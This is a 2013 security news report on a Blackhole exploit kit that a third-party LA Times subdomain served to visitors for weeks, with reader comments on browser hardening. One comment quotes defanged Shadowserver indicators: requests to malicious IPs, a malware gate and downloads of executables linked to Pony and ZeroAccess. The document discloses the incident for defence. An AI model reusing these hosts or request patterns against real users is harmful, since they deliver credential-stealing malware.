February 13, 2013

The Los Angeles Times has scrubbed its Web site of malicious code that served browser exploits and malware to potentially hundreds of thousands of readers over the past six weeks.

On Feb. 7, KrebsOnSecurity heard from two different readers that a subdomain of the LA Times’ news site (offersanddeals.latimes.com) was silently redirecting visitors to a third-party Web site retrofitted with the Blackhole exploit kit. I promptly asked my followers on Twitter if they had seen any indications that the site was compromised, and in short order heard from Jindrich Kubec, director of threat intelligence at Czech security firm Avast. 

latimesKubec checked Avast’s telemetry with its user base, and discovered that the very same LA Times subdomain was indeed redirecting visitors to a Blackhole exploit kit, and that the data showed this had been going on since at least December 23, 2012.

Contacted via email, LA Times spokeswoman Hillary Manning initially said a small number of users trying to access a subdomain of the site were instead served a malicious script warning on Feb. 2 and 3. But Manning said this was the result of a glitch in Google’s display ad exchange, not a malware attack on the company’s site.

“The LA Times, along with dozens of other Google ad exchange users including the New York Times, the Guardian, CNET, Huffington Post and ZDNet, were, to varying degrees, blocked by malicious script warnings,” Manning wrote in an email to KrebsOnSecurity. “The impacted sections of our site were quickly cleared and there was never any danger to users.”

Unfortunately, Avast and others continued to detect exploits coming from the news site. Manning subsequently acknowledged that the Google display ad issue was a separate and distinct incident, and that the publication’s tech team was working to address the problem.

Malicious code served by offersanddeals.latimes.com

Malicious code served by offersanddeals.latimes.com

It’s not clear how many readers may have been impacted by the attack, which appears to have been limited to the Offers and Deals page of the latimes.com Web site. Site metrics firm Alexa.com says this portion of the newspaper’s site receives about .12 percent of the site’s overall traffic, which according to the publication is about 18 million unique visitors per month. Assuming the site was compromised from Dec. 23, 2012 through the second week in February 2013, some 324,000 LA Times readers were likely exposed to the attack.

Security experts warn that the LA Times incident is unfortunately all-too-common. A report released this week by security and antivirus firm Sophos found that 80 percent of the Web sites where the company detects malicious content are innocent, legitimate sites that have been hacked.

According to Sophos, once attackers have figured out a way to inject content into a Web site, the rest of the intrusion follows a familiar script: The attackers add malicious content (usually snippets of JavaScript) that generate links to the pages on their Blackhole site. When unsuspecting users visit the legitimate site, their browsers also automatically pull down the exploit kit code from the Blackhole server.

“Once your browser sucks in the exploit kit content from the Blackhole server, the attack begins,” the company wrote in its latest threat report (PDF).  “The exploit code, usually JavaScript, first works out and records how your browser arrived at the Blackhole server. This identifies the affiliates who generate the traffic in the first place, so they can be paid just like affiliates in the legitimate economy. Then the exploit code fingerprints, or profiles, your browser to identify what operating system you are using, which browser version you have, and whether you have plugins installed for Flash, PDF files, Java applets and more.”

Unlucky visitors who are browsing the hacked page with outdated plugins will have their PCs infected with malware of the attacker’s choosing.

The LA Times attack highlights the daily security challenges facing Web site owners and Internet users. Keeping your browser and operating system up-to-date with the latest patches is a great start, but it’s not enough to keep you safe on the Web today.

I recommend that users remove unneeded and buggy plug-ins like Java, and use tools to block the automatic execution of Javascript, which should neuter most of these exploit kit attacks. Check out my primer “Tools for a Safer PC” for more details on how to tackle this. Also, Web site owners need to do their part to keep their sites secure. Ars Technica recently published a readable and useful primer on the major pitfalls that lead to hacked Web sites.

Update, 1:17 p.m. ET: In response to this story, The Los Angeles Times just released the following statement: “On February 6th the Los Angeles Times was made aware that malware was possibly being served by OffersandDeals.latimes.com. We quickly determined the problem was contained within the Offers & Deals sub-domain, which is maintained by a third party. Our forensics team undertook what is now an ongoing investigation and is working closely with the vendor to collect evidence surrounding the event.  To ensure safety, the Offers & Deals platform has been rebuilt and further secured. The sub-domain generates only advertising content and does not contain any customer information. As a trusted source of news and information, The Times takes matters of internet security very seriously and are pleased to report that there is no malware currently detectable on Offers & Deals.”

39 thoughts on “Exploit Sat on LA Times Website for 6 Weeks

  1. d

    Good to know.

    I’m using a Mac. I removed flash a long time ago and Java isn’t present. I also use LittleSnitch and Safari Cookies to clean out the left overs after visiting certain sites. I normally visit the LA times a few times a week. While I never go there, I always see an attempt to connect to offersanddeals.latimes.com.

    I, of course, will set up a rule to block these attempts.

    1. brian krebs

      Just a bit more info from yet another source, since the LAT seems to be still downplaying this in their public statements and suggesting that maybe they weren’t compromised, they’re not done with their review yet, etc.

      This comes from the Shadowserver Foundation, which tracks botnet activity and other bad stuff online. Several weeks ago, the foundation included this in one of their alerts (the hxxp is so that these don’t get turned into links):

      GET hxxp://209.126.248[.]50/c4a321872a63beed06c2476901dc4e8a/q.php
      hxxp://offersanddeals.latimes[.]com/places/embed Mozilla/5.0
      (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
      Mozilla/4.0 (Windows 7 6.1) Java/1.6.0_26
      Mozilla/4.0 (Windows 7 6.1) Java/1.6.0_26

      Leads to Pony & ZeroAccess:

      POST hxxp://65.75.137[.]237/gate.php Mozilla/4.0
      (compatible; MSIE 5.0; Windows 98)
      GET hxxp://first-cdn-node[.]com/1.exe Mozilla/4.0
      (compatible; MSIE 5.0; Windows 98)
      GET hxxp://first-cdn-node[.]com/6.exe Mozilla/4.0
      (compatible; MSIE 5.0; Windows 98)

  2. Vee

    I wonder if browsers like Firefox which implement Attack Site warnings reported users to avoid the site. That’s really the only method I can see that saves users from security neglect. I mean, even if they had NoScript they’d probably have LA Times in their whitelist, so I don’t think it’d help them here. Well, unless it’d pick it up as a third party script.

  3. Rabid Howler Monkey

    From the article:
    “Sophos found that 80 percent of the Web sites where the company detects malicious content are innocent, legitimate sites that have been hacked.

    Is it time to jettison the phrase “trusted web sites” and replace it with something more appropriate, such as “frequently-visited web sites”? The word “trust” (and derivations) is over-used with web browsers. For example, Internet Explorer has its “Trusted” Zone and Firefox, with the NoScript add-on, refers to “whitelisted” vs. “untrusted” sites, implying that “whitelisted sites” are trusted.

    Coarse though it may be, whitelisting frequently-visited web sites in ones browser(s) is better than not and enhances protection from web site black lists maintained by Google and Microsoft. Users need to “step up” and take some responsibility for their own on-line safety.

    P.S. 1 This article serves to reinforce advice from Brian’s earlier articles regarding “watering holes”.

    P.S. 2 Speaking of plug-ins, there appears to be a Adobe Reader zeo-day in the wild:


    1. Vee

      Well said, brother.

      I assume you mean “blacklist” here: “Coarse though it may be, whitelisting frequently-visited web sites in ones browser(s)” right? Or am I missing something, is why I ask.

      And on that Adobe Reader 0 day, are other .pdf readers generally safer solely based on their smaller userbase or are there any that truly have better security? Personally I’ve whittled down all my plugins to only flash being enabled, and lately I’m considering disabling flash and going html5 video.

      Krebs you need a forum for us to swap security tips sometime, even though it’d probably be high maintenance and attack targeted.

        1. Vee

          Oh yeah, I agree with that. With NoScript you never know what does what less you’re a page source viewing deity or something. Maybe someday they’ll make scripts selectively blockable like it does with flash, but I image it’d be hard to do, so I’ll take its black and white (list for that matter) stance over nothing. It’s highpoint for me have been for sites I don’t frequent.

          Probably live cds would be the safest way to browse the web, but no wants to mess with them just for that. Next would probably be virtual machines. I wonder if anyone has ever played with the idea of a virtual machine web browser.

          1. Matthew Reed

            I do use VM for web browsing. It can be a bit cumbersome so I break it down like this. While I keep my host OS patched and clean as possible, I do treat it as “compromised” and I NEVER put any personal information, payments or anything I wouldn’t want posted to the world on the host OS. I use this for doing my daily “read only” activities

            I keep a clean and updated snapshot of a VM on my primary machine and spin that up to log into my bank, credit cards, utilities, financial portfolio. I revert to the clean snapshot every time I spin it up in the event I picked something up along the way. At least once a month, I patch and scan the snapshot and update it as the new “clean” snapshot.

            It does require a 45 second delay to open a browser for banking but I think anyone reading this would understand why I think it is worth it.

      1. nov


        [And on that Adobe Reader 0 day, are other .pdf readers generally safer solely based on their smaller userbase or are there any that truly have better security?]

        An alternative pdf reader mentioned by Brian December 2011, was PDF-Xchange Viewer.
        Mentioned in the second paragraph from the end of his article here:

        PDF-Xchange Viewer does have less advisories than Adobe Reader version 10 as shown here:

        http://secunia.com/advisories/product/18144/?task=advisories (PDF-Xchange Viewer advisories)

        http://secunia.com/advisories/product/33102/?task=advisories (Using Adobe Reader version 10 as a comparison, instead of version 11).

        1. Vee

          Wow, thanks a ton for that! I had also remembered Krebs had once recommend those as well, but I couldn’t the link, which was the one you posted. I’m actually going to try out a GNU GPL PDF reader called Evince which I’ve used used before in Fedora Linux, while still disabling its browser plugin if it has one (pretty sure it does). I bookmarked that PDF-Xchange Viewer though, that is more what I’m looking for on a security bases with it having fewer reports. I still wonder even though other PDF viewers aren’t as targeted as Adode Reader if that just means there’s a lot of unknown vulnerabilities waiting to happen.

          I’m actually pretty happy I can FINALLY dump Adobe Reader after all these years!

    2. Onur Komili

      You quote a line from the paper that doesn’t have the word you accuse him of using. There’s a difference between “legitimate” and “trusted”. I interpret legitimate as a site that exists for a purpose other than malicious intent. That’s not to say it isn’t compromised and doing just that though.

      … and just to twist your words, a “frequently-visited web site” as you suggest wouldn’t really work either. A successful malicious campaign site will receive a lot of traffic for an extended period of time and can be considered a frequently visited site even though it’s there purely for malicious purposes.

      1. Rabid Howler Monkey

        I didn’t accuse Brian of using the word ‘trusted’. Instead, my examples were taken directly from the language used by modern web browsers.

        As for ‘frequently-visited web site’, that was meant to be from the perspective of an individual user. As well as an example of an alternative to ‘trusted’. But, I agree that ‘legitimate’, used by Brian in the article, or some other word or phrase might be better than what I used in my comment. I was mainly railing against the word ‘trusted’ (and derivations) used by modern web browsers themselves.

        1. nikol

          I would like to see the word “updates” be updated. In the auto industry, an update on faulty brakes is a recall. When jumbo jets need an update , they may ground the entire fleet worldwide to repair the defect.

      2. Vee

        Basically there shouldn’t be any false sense of security and all sites should be treated equally as far as risk. Even here many have started to leave krebsonsecurity in their NoScript black list after reading his watering hole story.

    1. Rabid Howler Monkey

      Since I am still on Windows XP and Vista, can you tell me if Windows 8 with Internet Explorer 10 (soon to be released for Windows 7) provide an easy way for users to manage ‘legitimate’ web sites via whitelisting? Based on the mitigations and workarounds described for the Internet Explorer vulnerabilities in Microsoft bulletin ms13-009, I’d say not.

      Another question: Why doesn’t Microsoft, by default, have Internet Explorer running in Enhanced Security Configuration on it’s client operating systems (e.g., Windows XP, Vista, 7 and 8)?

      This, at least, would give some fraction of it’s consumer, SOHO and small business customers a fighting chance. They’d at least have an opportunity to think about adding unknown web sites to Internet Explorer’s “Trusted” Zone.

      Note that Microsoft’s Enhanced Security Configuration (ESC) is built into their Windows server operating systems. While the ESC default behavior is not user-friendly, the Internet Explorer menu item ‘File’ -> ‘Add this site to’, also built into ESC, allows a user to go to a URL and easily add the URL to the Trusted Zone. Here’s a link to this described behavior for Windows Server 2003 (see the section “Add sites to the Trusted Sites zone”):


      1. mechBgon

        RHM, regarding IE and adding sites to the Trusted Zone, I don’t think that’s done very often in real-world usage. And that’s a good thing, since the Trusted Sites Zone’s default security level isn’t that high (Protected Mode’s disabled, for example).

        The Internet Zone’s default settings are reasonable, particularly on Vista/7/8 where Protected Mode, DEP and ASLR are enabled, and ActiveX controls have to be opted-in by the user. Microsoft and other browser makers could radically increase security just by disabling scripting by default, but what would the customer’s first impression be? “This software is broken, my previous browser had no problem with __________ (insert name of mainstream website).” They’re never going to go there.

        But since you asked about IE10 and Win8… I learned a lot from this article, even though it kind of made my head explode:
        http://blogs.msdn.com/b/ieinternals/archive/2012/03/23/understanding-ie10-enhanced-protected-mode-network-security-addons-cookies-metro-desktop.aspx?Redirected=true The Metro version of IE is plug-in-proof with the exception of a handful of sites that can use Flash Player, and the whole thing runs in an AppContainer that super-sandboxes it.

        As long as it’s a 64-bit version of Win8, the desktop version of IE can run its tabs in separate AppContainers too, by checking the “Enhanced Protected Mode” checkbox found in the Advanced tab of Internet Options. For sites that can’t work in EPM, there’s site-by-site fallback to regular Protected Mode on demand.

        It’ll be interesting to see the bad guys’ countermoves to these new hurdles. My guess: the great security-bypass extravaganza known as Java.

        1. Rabid Howler Monkey

          To understand where I am coming from, take a look at the MS13-009 security bulletin for February, 2013:


          Note that the two MS13-009 security vulnerabilities are mitigated with Windows server OSs because they default with Enhanced Security Configuration (ESC). Whereas Windows client OSs, with all of Microsoft’s security bells and whistles, require workarounds that essentially mimic ESR on Windows server OSs. This situation is not uncommon with Internet Explorer vulnerabilities.

          There are two philosophies at Microsoft regarding Internet Explorer security. For Windows server OSs, ESC is used to harden IE default settings so that the Internet Zone operates at a High security setting and the Trusted Zone operates at a Medium security setting. Significantly, JavaScript is prohibited in the Internet Zone and allowed in the Trusted Zone. With Windows server 2003, there is a relatively easy process to add web sites to the trusted zone (see my above post). With Windows server 2008 and 2008 R2, the process of adding a site to the trusted zone is also a relatively easy process:


          This is, more or less, how Firefox (with the NoScript add-on), Chrome (with or without the NotScripts extension) and Opera handle “trusted” web sites. One must overtly add web sites to the managed whitelist. Getting redirected to a web site controlled by the miscreants will result in a failed exploit attempt as JavaScript is disabled since the site isn’t whitelisted.

          The second philosophy applies to Windows client OSs and is essentially as you have described it in your post. JavaScript is allowed to run in the Internet Zone and runs in IEs sandbox, which is enhanced in Windows 8.

          IMO, it would be nice to have an option on Windows client OSs to easily add sites to IE’s Trusted Zone, change the Trusted Zone security level to Medium and change the Internet security level to High. One could name this option ‘Enhanced Security Configuration’ and easily toggle IE from one philosophy to the other (and even use Group Policy settings to set the appropriate philosophy for users).

          As an example, for online banking with a dedicated Windows PC, I’d set up a standard user account for that purpose, toggle IE to Enhanced Security Configuration, add my banking site(s) to my Favorites, add them to the Trusted Zone and then do my business. I would want my banking site(s) to have a higher level of “trust” than sites I could potentially be redirected to if the banking web sites were compromised (as was the Bank of India several years ago).

          1. mechBgon

            I understand now, and at one time IE did have an easier way to assign sites to zones with a mini-button on the Status Bar at the bottom of the screen, which Microsoft has gone away from.

            There is a practical, but clumsy, way to toggle between two configurations: set up a second user account on the computer and configure its Internet Options as desired, then run the browser as that user when you want that configuration by right-clicking and choosing Run As Different User (or setting up a dedicated launch icon with RunAs included, to automate this).

            I use this technique at work to monitor two Gmail accounts simultaneously. For the purpose of banking, another practical benefit is that the browser sees the file system from the point of view of the secondary account, and vice versa. So if one’s banking browser and downloaded financial information are in an entirely different Windows account, they are insulated from one’s daily-usage Windows account, its browser, and exploits running in the context of that account.

      2. rb

        @RHM, I believe you answered your own question:

        “the ESC default behavior is not user-friendly”

        Most ordinary users don’t want to have to fiddle with things like this. They just want it to work, in the same way their toaster or TV just works.

        This is the same reason why NoScript on FireFox is such a great solution for the security-conscious (who will put up with the additional work needed to manage permissions), but a terrible solution for everyone else.

        1. Rabid Howler Monkey

          Understood. All I’m asking for is the *option* to toggle Internet Explorer to Enhanced Security Configuration on Windows client OSs. Microsoft doesn’t have to make ESC the default behavior.

          Also, please note I don’t expect this to happen anytime soon. Thus, I ignore Internet Explorer on my Windows systems (aside from applying security updates).

  4. Derek

    So was the attack JavaScript being served directly from offersanddeals.latimes.com, or from a linked domain? I’m wondering if I was vulnerable if I only whitelisted latimes.com in NoScript, and blocked everything else…

    1. OhioMC

      I believe so. RequestPolicy was only blocking if you locked down to Full Address, not just Base or Full Domain.

    2. Neej

      Bear in mind I’m in no way qualified to give this advice – so anybody feel free to correct me – but as I read the article whitelisting the LA Times site and the particular subdomain would have stopped this attack since the browser would block the Blackhole server when the JS on LATime called it.

      “When unsuspecting users visit the legitimate site, their browsers also automatically pull down the exploit kit code from the Blackhole server.”

  5. JimV

    Guess now I’m not so irritated that the LA Times daily newsletter I’d been receiving for some years stopped arriving sometime last Autumn (despite still being toggled in my account settings). My visits to the site dropped off radically as a consequence of the monthly restriction imposed on free viewing of articles anyway, but I never would have clicked on to follow any of the webpage ads offered there to begin with.

  6. Chris

    Correct me if I’m wrong, but isn’t the “exposed reader” math off in the piece by a factor of 10?

    .12% of 18,000,000 = .0012 x 18,000,000 = 21,600 visitors per month

    1.5 months x 21,600 visitors/month = 32,400 visitors

    Quite a significant difference in my opinion.

    1. timeless

      Chrome is only available as a 32 bit application. Getting a browser (really its JavaScript JIT and VM) to work well on 64 bit is hard.

      For Firefox, we added code to tell sites we were running 32 bit on a 64 bit OS, Chrome might not have or have decided not to expose this detail for privacy/security.

      1. BrianKrebs Post author

        Yes, as Timeless said, Chrome is a 32-bit browser. There is currently no 64-bit version of Chrome that I’m aware of.

  7. Jorge Lopez

    I was LA Times subscriber, and I did not like when I signed in my account at LAtimes website, I was forced to accept third party cookies like double click and others. If I did not accepted them, I could not log in. I called the times and I told them that I did not like my information would be selling to third parties. They told me that was necessary to do it

  8. ted

    I would like browsers to refuse to load a script or image that has an ip address in its URL.


    This format should be a red flag.

  9. Eric Heitzman

    Please forgive the commercial nature of this comment, it’s not SPAM in this case since I feel it is apropos:

    Qualys offers two services that might be of interest to your readers:
    1. Free “BrowserCheck” helps individuals and businesses check the security of their browser, and Flash, and Java, and Silverlight etc. to help prevent getting exploited. (https://browsercheck.qualys.com)

    2. For businesses, our web server based Malware Detection Service monitors your web site for evidence of compromise, or instances where it is serving up malware. (http://www.qualys.com/enterprises/qualysguard/malware-detection/).

    Hope that helps someone,


    1. Heron

      Advertisements can seem “apropos,” but still be unwelcome commercial content. I think it’s bad form to advertise a product in online comments.

  10. nov

    About the “glitch in Google’s display ad exchange” mentioned in the article: February 7th and 8th, Suricata /w Emerging Threats Pro was detecting a lower severity level 3 on three Google IP addresses associated with offersanddeals.latimes.com

    Overall, urlquery.net called the alert “No alerts detected” [false positives, which seems right so far].

    Reference the Intrusion Detection System section:

  11. nov

    About the LAT and other news sources being “trusted source of news and information”: I don’t see ‘details’ of these attacks coming from them. No thanks, I don’t trust general news sources to report on this incident and many other incidents continuously occurring on other legitimate sites.

  12. Karden Snow

    I loved it when the LA Times reporter told Brian via Twitter that it was, what were his words, something like “no big deal”, that this breach had occurred. What is the liability for the LA Times and its careless attitude about serving up malware to half a million subscribers? Where’s a lahyuh when you need one?

    1. JimV

      They’re probably more inclined to troll among or sniff around those folks who were trapped aboard that disabled Carnival ship due to the ready cash reserves of its owner and the bounded number of potential litigants by comparison with the shaky Tribune group’s finances and an amorphous number of not-so-obviously injured parties in some prospective class-action likely to extend over some years….

Comments are closed.